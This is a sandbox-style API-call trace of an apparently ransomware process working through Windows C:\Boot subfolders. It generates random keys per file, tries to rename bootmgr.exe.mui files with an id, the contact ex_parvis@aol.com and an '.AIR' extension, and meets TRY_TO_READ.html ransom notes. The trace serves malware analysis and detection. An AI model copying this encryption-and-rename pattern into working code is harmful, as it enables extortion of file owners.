[0116.590] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.590] CloseHandle (hObject=0xffffffff) returned 0 [0116.590] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.590] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.590] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.590] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.590] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e1e8 | out: hHeap=0x2e0000) returned 1 [0116.590] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e210 | out: hHeap=0x2e0000) returned 1 [0116.590] FindFirstFileW (in: lpFileName="C:\\\\Boot\\es-ES\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317e88 [0116.590] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.591] GetLastError () returned 0x6 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e1e8 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317ec8 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317ec8 | out: hHeap=0x2e0000) returned 1 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e1e8 | out: hHeap=0x2e0000) returned 1 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.591] FindNextFileW (in: hFindFile=0x317e88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.591] GetLastError () returned 0x6 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e1e8 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317ec8 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317ec8 | out: hHeap=0x2e0000) returned 1 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e1e8 | out: hHeap=0x2e0000) returned 1 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.591] FindNextFileW (in: hFindFile=0x317e88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.591] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.591] GetLastError () returned 0x6 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e1e8 [0116.591] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.592] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.592] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.592] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.592] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e1e8 | out: hHeap=0x2e0000) returned 1 [0116.592] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.592] FindNextFileW (in: hFindFile=0x317e88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.592] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.592] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.592] GetLastError () returned 0x6 [0116.592] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.592] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.592] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.592] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.592] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.592] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.592] FindNextFileW (in: hFindFile=0x317e88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.592] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.592] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x35d738 [0116.592] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330ac8 [0116.592] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x35d738 | out: pbBuffer=0x35d738) returned 1 [0116.592] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330ac8 | out: pbBuffer=0x330ac8) returned 1 [0116.592] SetFileAttributesW (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.592] lstrlenW (lpString="C:\\\\Boot\\es-ES\\bootmgr.exe.mui") returned 30 [0116.592] GetProcessHeap () returned 0x2e0000 [0116.592] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.592] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\es-ES\\bootmgr.exe.mui") returned="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" [0116.592] lstrcatW (in: lpString1="C:\\\\Boot\\es-ES\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.592] MoveFileExW (lpExistingFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.592] CreateFileW (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.593] GetProcessHeap () returned 0x2e0000 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.593] CloseHandle (hObject=0xffffffff) returned 0 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.593] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e238 | out: hHeap=0x2e0000) returned 1 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e260 | out: hHeap=0x2e0000) returned 1 [0116.593] FindFirstFileW (in: lpFileName="C:\\\\Boot\\fi-FI\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317ec8 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.593] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.593] GetLastError () returned 0x6 [0116.593] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.593] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.593] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e238 [0116.593] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d858 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d858 | out: hHeap=0x2e0000) returned 1 [0116.593] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e238 | out: hHeap=0x2e0000) returned 1 [0116.593] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.593] FindNextFileW (in: hFindFile=0x317ec8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.594] GetLastError () returned 0x6 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e238 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d858 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d858 | out: hHeap=0x2e0000) returned 1 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e238 | out: hHeap=0x2e0000) returned 1 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.594] FindNextFileW (in: hFindFile=0x317ec8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.594] GetLastError () returned 0x6 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e238 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e238 | out: hHeap=0x2e0000) returned 1 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.594] FindNextFileW (in: hFindFile=0x317ec8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fbb870, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.594] GetLastError () returned 0x6 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.594] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.594] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.595] FindNextFileW (in: hFindFile=0x317ec8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fbb870, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x35f848 [0116.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330ad8 [0116.595] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x35f848 | out: pbBuffer=0x35f848) returned 1 [0116.595] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330ad8 | out: pbBuffer=0x330ad8) returned 1 [0116.595] SetFileAttributesW (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.595] lstrlenW (lpString="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui") returned 30 [0116.595] GetProcessHeap () returned 0x2e0000 [0116.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.595] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui") returned="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" [0116.595] lstrcatW (in: lpString1="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.595] MoveFileExW (lpExistingFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.595] CreateFileW (lpFileName="C:\\\\Boot\\fi-FI\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.595] GetProcessHeap () returned 0x2e0000 [0116.595] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.595] CloseHandle (hObject=0xffffffff) returned 0 [0116.595] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.595] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.595] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.595] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e288 | out: hHeap=0x2e0000) returned 1 [0116.595] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e2b0 | out: hHeap=0x2e0000) returned 1 [0116.595] FindFirstFileW (in: lpFileName="C:\\\\Boot\\Fonts\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96fbb870, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fbb870, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35d858 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.596] GetLastError () returned 0x6 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e288 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d898 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d898 | out: hHeap=0x2e0000) returned 1 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e288 | out: hHeap=0x2e0000) returned 1 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.596] FindNextFileW (in: hFindFile=0x35d858, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96fbb870, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96fbb870, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.596] GetLastError () returned 0x6 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e288 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35d898 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35d898 | out: hHeap=0x2e0000) returned 1 [0116.596] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e288 | out: hHeap=0x2e0000) returned 1 [0116.596] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.596] FindNextFileW (in: hFindFile=0x35d858, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 